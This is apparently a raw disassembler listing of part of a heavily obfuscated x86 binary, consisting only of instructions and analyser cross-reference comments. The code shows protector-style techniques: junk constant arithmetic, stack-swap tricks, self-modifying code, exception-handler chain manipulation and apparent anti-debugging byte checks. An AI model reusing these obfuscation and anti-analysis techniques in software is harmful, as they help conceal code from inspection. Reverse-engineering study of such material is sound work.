; FUNCTION CHUNK AT 00450184 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004501B5 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00450A47 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00450D77 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045178D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00451AC2 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00451B9B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004533DB SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00453B14 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 00456349 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004569C1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045895C SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0045ACBE SIZE 00000017 BYTES

		jns	loc_4497E5
		xchg	ebp, [esp+0]
		mov	edx, ebp
		pop	ebp
		mov	eax, [esp+10h+var_10]
		push	esi
		jmp	loc_441F59
sub_445CCD	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		mov	ebx, 0A853A063h
		jmp	sub_4391F1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451E6D

loc_445CEC:				; CODE XREF: sub_451E6D+8DECj
		xchg	esi, edx

loc_445CEE:				; CODE XREF: sub_451E6D:loc_457560j
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_4520C7
		jmp	loc_445C8D
; END OF FUNCTION CHUNK	FOR sub_451E6D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445488

loc_445CFF:				; CODE XREF: sub_445488:loc_43B891j
					; hvvrg7ie:loc_43CBC3j
		add	edx, 6EAE53A9h
		xchg	edx, [esp+4+var_4]
		jmp	sub_43A87E
; END OF FUNCTION CHUNK	FOR sub_445488

; =============== S U B	R O U T	I N E =======================================



sub_445D0D	proc near		; CODE XREF: hvvrg7ie:0044DCDBj
					; hvvrg7ie:0045A12Fp
		xchg	eax, [esp+0]
		pop	eax
		ror	eax, 3
sub_445D0D	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_43EF3E

loc_445D14:				; CODE XREF: sub_43EF3E+188E9j
		mov	ds:dword_43CDAC, eax
		jmp	loc_45A139
; END OF FUNCTION CHUNK	FOR sub_43EF3E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A0B1

loc_445D1F:				; CODE XREF: sub_45A0B1-1B451j
					; sub_45A0B1:loc_44647Fj
		call	sub_44DE0A
		mov	edx, 8D40711Dh
		push	offset sub_44B8A4
		jmp	nullsub_395
; END OF FUNCTION CHUNK	FOR sub_45A0B1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456E27

loc_445D33:				; CODE XREF: sub_456E27+4299j
		pop	edi
		rol	edi, 8
		xor	edi, 6F6E98D0h
		sub	edi, 2776FAA0h
		xor	edi, 748F2A9h
		push	offset sub_43C0D0
		jmp	loc_43C11E
; END OF FUNCTION CHUNK	FOR sub_456E27

; =============== S U B	R O U T	I N E =======================================



sub_445D53	proc near		; DATA XREF: hvvrg7ie:004566B8o

; FUNCTION CHUNK AT 004526BE SIZE 0000000B BYTES

		push	edx
		call	sub_43D824

loc_445D59:				; CODE XREF: hvvrg7ie:00447701j
		jmp	loc_4526BE
sub_445D53	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4413A5

loc_445D5E:				; CODE XREF: sub_4413A5-61CBj
		jmp	loc_443EC7
; END OF FUNCTION CHUNK	FOR sub_4413A5
; ---------------------------------------------------------------------------

loc_445D63:				; CODE XREF: hvvrg7ie:0045B1A2j
		js	loc_456E33
		shl	ebp, 9
		jmp	loc_441A1A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E3B3

loc_445D71:				; CODE XREF: sub_44E3B3:loc_452EF1j
		pop	ebx

loc_445D72:				; CODE XREF: hvvrg7ie:loc_458F79j
		and	eax, 51A1CB4Fh
		add	eax, 62600FD2h
		call	sub_4403B6
; END OF FUNCTION CHUNK	FOR sub_44E3B3
; START	OF FUNCTION CHUNK FOR sub_43EE33

loc_445D83:				; CODE XREF: sub_43EE33-4D4Cj
		jmp	loc_458213
; END OF FUNCTION CHUNK	FOR sub_43EE33
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AEE1

loc_445D88:				; CODE XREF: sub_45AEE1-665Bj
		jz	loc_43C082
		jmp	loc_43FC75
; END OF FUNCTION CHUNK	FOR sub_45AEE1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44412E

loc_445D93:				; CODE XREF: sub_44412E:loc_45596Ej
		pop	esi
		and	eax, 618184D8h
		rol	eax, 10h
		xor	eax, 48F9D5FBh
		add	eax, ebp
		add	eax, 0B39E0B81h
		jmp	loc_452DA6
; END OF FUNCTION CHUNK	FOR sub_44412E
; ---------------------------------------------------------------------------

locret_445DB0:				; CODE XREF: hvvrg7ie:loc_44EE30j
		retn
; ---------------------------------------------------------------------------

loc_445DB1:				; CODE XREF: hvvrg7ie:0043E5F1j
		jmp	loc_444240
; ---------------------------------------------------------------------------

loc_445DB6:				; CODE XREF: hvvrg7ie:0045B695j
		lea	eax, nullsub_471
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_471

; =============== S U B	R O U T	I N E =======================================



sub_445DC4	proc near		; CODE XREF: sub_4031FD+BEp
					; sub_404A3E+D9p ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00440D49 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044444B SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00448D72 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449C76 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044CC50 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0044EA26 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00454BEF SIZE 00000012 BYTES

		push	ecx
		mov	ecx, ebx
		xchg	ecx, [esp+4+var_4]
		push	0C8E94832h
		mov	ebx, 0C31238BAh
		jmp	loc_44EA26
sub_445DC4	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446D8D

loc_445DD9:				; CODE XREF: sub_446D8D:loc_448779j
		adc	esi, 4081A16h
		push	42025616h
		jmp	loc_4594A7
; END OF FUNCTION CHUNK	FOR sub_446D8D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_445DE9:				; CODE XREF: sub_4465A6:loc_44D3D1j
		jz	loc_444DE2
		jmp	loc_4450A3
; END OF FUNCTION CHUNK	FOR sub_4465A6

; =============== S U B	R O U T	I N E =======================================



sub_445DF4	proc near		; DATA XREF: sub_442D68+A481o

; FUNCTION CHUNK AT 00449D8E SIZE 00000005 BYTES

		xor	ebx, 6E00E943h
		add	ebx, ebp
		add	ebx, 60D92AB1h
		mov	[ebx], eax
		pop	ebx
		jmp	loc_449D8E
sub_445DF4	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448ECC

loc_445E0A:				; CODE XREF: sub_448ECC+6j
		pop	edx
		mov	eax, [esp-4+arg_0]
		push	edx
		call	sub_4525FC
		mov	eax, 0D372DA5Dh
		jmp	loc_43A3F0
; END OF FUNCTION CHUNK	FOR sub_448ECC
; ---------------------------------------------------------------------------
		mov	[ebx], edi
		jmp	loc_43D4D0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_431. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451703

loc_445E26:				; CODE XREF: sub_451703+3j
		xchg	eax, [esp+4+var_4]
		mov	ebp, esp
		add	esp, 0FFFFFEF8h
		mov	[ebp-104h], eax
		mov	dword ptr [ebp-100h], 276E6143h
		mov	dword ptr [ebp-0FCh], 6F6C2074h
		jmp	loc_458D65
; END OF FUNCTION CHUNK	FOR sub_451703
; ---------------------------------------------------------------------------

locret_445E50:				; CODE XREF: hvvrg7ie:0043BF47j
		retn
; ---------------------------------------------------------------------------

loc_445E51:				; CODE XREF: hvvrg7ie:loc_44CA16j
		pop	edi
		jmp	loc_45897B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4527A1

loc_445E57:				; CODE XREF: sub_4527A1:loc_43C943j
		jz	loc_4493AE
		jmp	loc_454757
; END OF FUNCTION CHUNK	FOR sub_4527A1

; =============== S U B	R O U T	I N E =======================================



sub_445E62	proc near		; DATA XREF: sub_43C0DE:loc_443266o

; FUNCTION CHUNK AT 00447D31 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044CE29 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0044D378 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004503D3 SIZE 00000002 BYTES

		mov	eax, [ebp-4]

loc_445E65:				; CODE XREF: hvvrg7ie:loc_44778Dj
		cmp	byte ptr [eax],	0F1h
		jnz	loc_4503DA
		jmp	loc_447D31
sub_445E62	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440195

loc_445E73:				; CODE XREF: sub_440195:loc_447074j
		jnz	loc_448D7D
		jmp	loc_459864
; END OF FUNCTION CHUNK	FOR sub_440195
; ---------------------------------------------------------------------------
		ror	eax, 1Dh
		mov	ebp, [ecx]
		test	edi, 7E6627C0h
		jmp	loc_455A8D

; =============== S U B	R O U T	I N E =======================================



sub_445E8E	proc near		; CODE XREF: hvvrg7ie:0043CBA5j
					; sub_4495B9-8618p

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0044038C SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00447D85 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 004585E9 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		push	eax
		pushf
		push	0C3913FABh
		xchg	ebp, [esp+8+var_8]
		mov	eax, ebp
		pop	ebp
		jmp	loc_44038C
sub_445E8E	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4462F9

loc_445EA4:				; CODE XREF: sub_4462F9:loc_43F00Cj
		shr	ecx, 18h
		add	edi, ebp
		adc	ecx, 24DE79B6h
		jmp	loc_43CA0D
; END OF FUNCTION CHUNK	FOR sub_4462F9
; ---------------------------------------------------------------------------

loc_445EB4:				; DATA XREF: sub_444E49-2DAEo
		mov	eax, ds:dword_448D1C
		or	eax, eax
		jnz	loc_44BB7A
		jmp	loc_446C41
; ---------------------------------------------------------------------------

loc_445EC7:				; DATA XREF: sub_450EA4+Ao
		call	sub_44612F
		call	sub_4589D3
; START	OF FUNCTION CHUNK FOR sub_458706

loc_445ED1:				; CODE XREF: sub_458706-10748j
		jmp	loc_44470B
; END OF FUNCTION CHUNK	FOR sub_458706

; =============== S U B	R O U T	I N E =======================================



sub_445ED6	proc near		; DATA XREF: hvvrg7ie:00451ED9o
		xchg	ebx, [esp+0]
		jmp	sub_450C5A
sub_445ED6	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448DE4

loc_445EDE:				; CODE XREF: sub_448DE4:loc_43CDFAj
		ja	loc_44CFEE
		jmp	loc_44EB77
; END OF FUNCTION CHUNK	FOR sub_448DE4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4438FA

loc_445EE9:				; CODE XREF: sub_4438FA+1j
		mov	ebp, esp
		add	esp, 0FFFFFFECh
		mov	[ebp-4], eax
		mov	eax, [ebp-4]
		jmp	loc_44BA5C
; END OF FUNCTION CHUNK	FOR sub_4438FA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B048

loc_445EF9:				; CODE XREF: sub_45B048-1758Cj
		jnb	sub_443C1D
		push	297D3145h
		mov	edi, 0CBD49992h

loc_445F09:				; CODE XREF: sub_45B048:loc_44EBD6j
		pop	large dword ptr	fs:0
		jmp	loc_43F4EE
; END OF FUNCTION CHUNK	FOR sub_45B048
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_469. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_445F16:				; CODE XREF: hvvrg7ie:00450ABAj
		jg	loc_44D5D2
		ror	ebp, 1Dh
		jmp	sub_45642F
; ---------------------------------------------------------------------------

locret_445F24:				; CODE XREF: hvvrg7ie:loc_45A3DFj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CD0B

loc_445F25:				; CODE XREF: sub_43CD0B+9CEAj
		jmp	loc_4413B6
; END OF FUNCTION CHUNK	FOR sub_43CD0B

; =============== S U B	R O U T	I N E =======================================



sub_445F2A	proc near		; CODE XREF: sub_44AB4C:loc_44AB64p
					; hvvrg7ie:0044BF90j

; FUNCTION CHUNK AT 0043A30F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E2D8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00444790 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00444B0F SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004456D1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004468D6 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00446CC5 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044769F SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00447845 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044AB78 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044D502 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004516CA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045644A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045668D SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00456D6D SIZE 0000000E BYTES

		xchg	esi, [esp+0]
		pop	esi
		add	eax, 0AD777DCFh
		add	eax, ebp
		add	eax, 998F879Ah
		mov	eax, [eax]
		mov	eax, [eax+18h]
		jmp	loc_45644A
sub_445F2A	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_61. PRESS	KEYPAD "+" TO EXPAND]
		db 89h
; ---------------------------------------------------------------------------
		ficomp	dword ptr [esi-74A60000h]
		add	al, 24h
		push	eax
		mov	eax, edx
		xchg	eax, [esp]
		jmp	loc_442465

; =============== S U B	R O U T	I N E =======================================



sub_445F5B	proc near		; CODE XREF: sub_451669-10FFFp
					; hvvrg7ie:0044CFCBj

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043ACEA SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043D504 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044B61B SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		xor	eax, 54EB3D89h
		add	eax, ebp
		add	eax, 557E7CE9h
		jmp	loc_43ACEA
sub_445F5B	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_445F72	proc near		; CODE XREF: sub_451FADj
					; DATA XREF: hvvrg7ie:00451FA3o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043CB6C SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00451593 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004542F0 SIZE 00000006 BYTES

		call	sub_4585EE
		mov	eax, 0FFB060E7h
		push	eax
		mov	eax, ebx
		xchg	eax, [esp+4+var_4]
		push	0B7A86137h
		pop	ebx
		jmp	loc_43CB6C
sub_445F72	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448BC0

loc_445F8D:				; CODE XREF: sub_448BC0:loc_452E3Ej
					; sub_448BC0+B267j
		push	339CA9ADh

loc_445F92:				; CODE XREF: hvvrg7ie:loc_44E5EFj
		pop	eax
		sub	eax, 57E40872h
		xor	eax, 0C4EE0D40h
		jmp	loc_439805
; END OF FUNCTION CHUNK	FOR sub_448BC0
; ---------------------------------------------------------------------------

locret_445FA4:				; CODE XREF: hvvrg7ie:00449BEEj
		retn
; ---------------------------------------------------------------------------
		ja	loc_447A17
		jmp	sub_44C91C
; ---------------------------------------------------------------------------
		ror	ebp, 11h
		jmp	loc_451F4A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443452

loc_445FB8:				; CODE XREF: sub_443452+Cj
		jnz	loc_45AA28
		jmp	loc_450904
; END OF FUNCTION CHUNK	FOR sub_443452
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452E0B

loc_445FC3:				; CODE XREF: sub_452E0B+7j
		add	ecx, 20AABDDAh
		cmp	ecx, 0B2C23F4Bh
; END OF FUNCTION CHUNK	FOR sub_452E0B
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_445FCF:				; CODE XREF: sub_4465A6-1C81j
		jmp	loc_445344
; END OF FUNCTION CHUNK	FOR sub_4465A6

; =============== S U B	R O U T	I N E =======================================



sub_445FD4	proc near		; CODE XREF: hvvrg7ie:0043F69Bj
					; sub_43B8A5+16444p

; FUNCTION CHUNK AT 0043DF3D SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		call	sub_445FE6
		pop	ecx
		mov	[ebp-20h], eax
		jmp	loc_43DF3D
sub_445FD4	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_445FE6	proc near		; CODE XREF: sub_445FD4+4p

; FUNCTION CHUNK AT 00444267 SIZE 00000005 BYTES

		push	ebp
		mov	ebp, esp
		jmp	loc_444267
sub_445FE6	endp

; ---------------------------------------------------------------------------

loc_445FEE:				; CODE XREF: hvvrg7ie:0043A66Fj
		jg	loc_45184B
		push	0B58B47DBh
		jmp	loc_43F66E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B3F1

loc_445FFE:				; CODE XREF: sub_44B3F1-1D7j
		xchg	esi, [esp+4+var_4]
		jmp	loc_44A5BA
; END OF FUNCTION CHUNK	FOR sub_44B3F1
; ---------------------------------------------------------------------------

loc_446006:				; CODE XREF: hvvrg7ie:0044A6F6j
		mov	ebx, ebp
; START	OF FUNCTION CHUNK FOR sub_450434

loc_446008:				; CODE XREF: sub_450434:loc_44A6E5j
		xor	eax, 0EDF3A94Bh
		add	eax, ebp
		add	eax, 9A0DC067h
		mov	eax, [eax]
		call	sub_442FD1

loc_44601D:				; CODE XREF: sub_45AF0A-D836j
		jmp	loc_451918
; END OF FUNCTION CHUNK	FOR sub_450434
; ---------------------------------------------------------------------------

loc_446022:				; CODE XREF: hvvrg7ie:0045A92Cj
		or	ebx, 3336FAF6h
		xchg	edi, ecx
		jmp	loc_458DF5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446EC2

loc_44602F:				; CODE XREF: sub_446EC2-A60Dj
		push	offset loc_44BB91
		jmp	loc_457B65
; END OF FUNCTION CHUNK	FOR sub_446EC2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E3B3

loc_446039:				; CODE XREF: sub_44E3B3:loc_44D43Cj
		mov	[ebp-14h], eax
		cmp	dword ptr [ebp-14h], 0
		jnz	loc_454A6B
		jmp	loc_454A04
; END OF FUNCTION CHUNK	FOR sub_44E3B3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45038B

loc_44604B:				; CODE XREF: sub_45038B-FAC0j
		js	loc_445914
		popf

loc_446052:				; CODE XREF: sub_44BEBB:loc_446CA9j
		mov	eax, 0E0h
		call	sub_457C82
		jmp	loc_4564FA
; END OF FUNCTION CHUNK	FOR sub_45038B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BEBB

loc_446061:				; CODE XREF: sub_44BEBB-11C87j
		jb	loc_43C92B
		push	edi
		push	0C67AB433h
		jmp	loc_44DA2B
; END OF FUNCTION CHUNK	FOR sub_44BEBB

; =============== S U B	R O U T	I N E =======================================



sub_446072	proc near		; CODE XREF: sub_4465A6:loc_457FC2p

; FUNCTION CHUNK AT 0043B6E7 SIZE 00000026 BYTES
; FUNCTION CHUNK AT 0043E5CC SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		pop	ecx
		push	edi
		push	0BAA5DFCAh
		jmp	loc_43E5CC
sub_446072	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4590E0

loc_446082:				; CODE XREF: sub_4590E0:loc_45AB64j
		push	offset sub_44CA4B
		jmp	nullsub_430
; END OF FUNCTION CHUNK	FOR sub_4590E0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439873

loc_44608C:				; CODE XREF: sub_439873:loc_43A661j
		sub	ecx, 0B54801B5h
		or	ecx, 0ADD1D776h
		xor	ecx, 4942A096h
		rol	ecx, 2
		add	ecx, 654DA9A1h
		xchg	ecx, [esp-0Ch+arg_8]
		jmp	sub_456DE7
; END OF FUNCTION CHUNK	FOR sub_439873
; ---------------------------------------------------------------------------

loc_4460AF:				; CODE XREF: hvvrg7ie:loc_450D67j
		jbe	loc_45145E
		and	edi, 4A9F9722h
		jmp	loc_442E51
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449D75

loc_4460C0:				; CODE XREF: sub_449D75:loc_449D84j
		push	offset loc_446FDD
		jmp	nullsub_322
; END OF FUNCTION CHUNK	FOR sub_449D75
; ---------------------------------------------------------------------------

loc_4460CA:				; DATA XREF: sub_43AB99:loc_43FD47o
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_4500DF
		jmp	loc_4421FE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455B9C

loc_4460DB:				; CODE XREF: sub_455B9C:loc_43F2EDj
		mov	ecx, 23CAA66Ch
		jmp	loc_43CFDA
; END OF FUNCTION CHUNK	FOR sub_455B9C
; ---------------------------------------------------------------------------
		not	ebx
		pop	ebp
		jmp	sub_45970D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_90. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EB47

loc_4460EE:				; CODE XREF: sub_43EB47+FE7Dj
		jmp	loc_452A58
; END OF FUNCTION CHUNK	FOR sub_43EB47
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440643

loc_4460F3:				; CODE XREF: sub_440643+BB08j
		jmp	sub_43C836
; END OF FUNCTION CHUNK	FOR sub_440643
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445B46

loc_4460F8:				; CODE XREF: sub_445B46:loc_447DB1j
		pop	ebx
		mov	eax, [esp+0]
		push	esi
		mov	esi, edx
		xchg	esi, [esp+4+var_4]
		call	sub_44F7CF
		mov	eax, 0BEB860A6h
		call	sub_450C5A
		jmp	sub_458C3B
; END OF FUNCTION CHUNK	FOR sub_445B46
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E3B3

loc_446116:				; CODE XREF: sub_44E3B3-CFBj
		jz	loc_45A686
		jmp	loc_43EC39
; END OF FUNCTION CHUNK	FOR sub_44E3B3
; ---------------------------------------------------------------------------

locret_446121:				; CODE XREF: hvvrg7ie:loc_451FB3j
		retn
; ---------------------------------------------------------------------------

loc_446122:				; CODE XREF: hvvrg7ie:0043A5D5j
		jmp	locret_45A10B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A87E

loc_446127:				; CODE XREF: sub_44A87E:loc_4449E5j
		mov	[ebp-8], eax
		jmp	loc_44AB6E
; END OF FUNCTION CHUNK	FOR sub_44A87E

; =============== S U B	R O U T	I N E =======================================



sub_44612F	proc near		; CODE XREF: sub_4554E8-1A501p
					; sub_44A87E-CDC0p ...

; FUNCTION CHUNK AT 0044E04D SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0044FE34 SIZE 00000008 BYTES

		js	sub_446581
		push	ebp
		mov	ebp, esp
		push	ecx
		cmp	ds:dword_45A8B0, 0
		call	sub_43AFB6

loc_446145:				; CODE XREF: hvvrg7ie:004456E5j
		jmp	loc_44E04D
sub_44612F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_44614A:				; CODE XREF: sub_44D2F8-1330Fj
		jmp	loc_45AD99
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------
		push	esi
		push	5030B9FDh
		pop	esi
		and	esi, 45226FEh
		or	esi, 1B812317h
		add	esi, 0E4B0AC71h
		jmp	loc_441E3F
; ---------------------------------------------------------------------------

loc_44616D:				; CODE XREF: hvvrg7ie:004576B8j
		mov	ecx, edi

; =============== S U B	R O U T	I N E =======================================



sub_44616F	proc near		; CODE XREF: sub_455B9C:loc_43A890p

var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043941C SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0043DE5C SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043FAB5 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004403E2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440C82 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004410F6 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00441F39 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00445C31 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0044623B SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00447C82 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00448D87 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449BA3 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044A89A SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0044B16E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BF95 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044C53A SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044CC94 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D16B SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044DBD1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DFD8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E6D0 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044EC48 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045051E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450C7A SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00453971 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00453ABE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045531B SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00455B97 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045844B SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0045977E SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0045987E SIZE 00000014 BYTES

		xchg	edx, [esp+0Ch+var_C]
		pop	edx
		xchg	ebp, [esp+8+var_8]
		jmp	loc_45051E
sub_44616F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		pop	ecx
		jmp	loc_43B63A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4484E1

loc_446181:				; CODE XREF: sub_4484E1:loc_453290j
		cmp	ecx, 0D6DECB67h

loc_446187:				; CODE XREF: hvvrg7ie:loc_44CD93j
		jmp	loc_43BE77
; END OF FUNCTION CHUNK	FOR sub_4484E1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4462F9

loc_44618C:				; CODE XREF: sub_4462F9:loc_446761j
		popf
		jb	loc_43E4E8
		pushf
		jmp	loc_44520A
; END OF FUNCTION CHUNK	FOR sub_4462F9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456A52

loc_446199:				; CODE XREF: sub_456A52:loc_43B5F7j
		push	ecx
		push	0B21449C7h
		pop	ecx
		sub	ecx, 7435D40Fh
		add	ecx, 0FA902A29h
		xor	ecx, 0AA298ADCh
		jmp	loc_448CF8
; END OF FUNCTION CHUNK	FOR sub_456A52
; ---------------------------------------------------------------------------
		xor	eax, 3B4F9F58h
		jmp	loc_450697
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BEBB

loc_4461C2:				; CODE XREF: sub_44BEBB-C112j
		xchg	ebp, edx
		jnp	loc_450862
		sub	esi, ebp

loc_4461CC:				; CODE XREF: sub_44BEBB:loc_43D9CBj
		call	nullsub_7
		retn
; END OF FUNCTION CHUNK	FOR sub_44BEBB
; ---------------------------------------------------------------------------

loc_4461D2:				; CODE XREF: hvvrg7ie:0043C916j
		jmp	loc_44709A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_7. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443E56

loc_4461D8:				; CODE XREF: sub_443E56+1493Cj
		jmp	loc_43F244
; END OF FUNCTION CHUNK	FOR sub_443E56
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C61

loc_4461DD:				; CODE XREF: sub_440C61+13876j
		jmp	loc_4506DA
; END OF FUNCTION CHUNK	FOR sub_440C61
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4414F6

loc_4461E2:				; CODE XREF: sub_4414F6:loc_44FCB6j
		push	531F0787h
		not	esi
